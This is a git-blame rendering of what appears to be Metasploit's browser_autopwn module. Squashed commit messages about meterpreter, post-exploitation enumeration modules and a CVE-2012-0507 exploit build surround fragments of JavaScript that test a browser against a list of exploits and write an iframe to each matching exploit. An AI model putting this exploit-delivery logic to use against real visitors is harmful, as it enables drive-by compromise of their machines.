Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
};
|
|
|
|
window.next_exploit = function(exploit_idx) {
|
2012-04-18 00:54:26 +00:00
|
|
|
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
|
2009-12-16 00:13:57 +00:00
|
|
|
if (!global_exploit_list[exploit_idx]) {
|
2012-04-18 00:54:26 +00:00
|
|
|
#{js_debug("'End<br>'")}
|
2009-12-16 00:13:57 +00:00
|
|
|
return;
|
|
|
|
}
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + ' of ' + global_exploit_list.length + '<br>'")}
|
2009-12-16 00:13:57 +00:00
|
|
|
// Wrap all of the vuln tests in a try-catch block so a
|
|
|
|
// single borked test doesn't prevent other exploits
|
|
|
|
// from working.
|
|
|
|
try {
|
|
|
|
var test = global_exploit_list[exploit_idx].test;
|
2012-04-05 07:33:07 +00:00
|
|
|
// Debugging
|
|
|
|
//tn = document.createTextNode("Test " + exploit_idx +"\\n");
|
|
|
|
//br = document.createElement("br");
|
|
|
|
//document.body.appendChild(tn);
|
|
|
|
//document.body.appendChild(br);
|
|
|
|
//tn = document.createTextNode(test);
|
|
|
|
//document.body.appendChild(tn);
|
2009-12-16 00:13:57 +00:00
|
|
|
if (!test) {
|
|
|
|
test = "true";
|
|
|
|
}
|
2011-05-20 09:11:43 +00:00
|
|
|
|
2009-12-16 00:13:57 +00:00
|
|
|
if (eval(test)) {
|
2011-05-20 09:11:43 +00:00
|
|
|
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
2012-04-08 23:06:23 +00:00
|
|
|
window.write_iframe(global_exploit_list[exploit_idx].resource);
|
|
|
|
setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
2009-12-16 00:13:57 +00:00
|
|
|
} else {
|
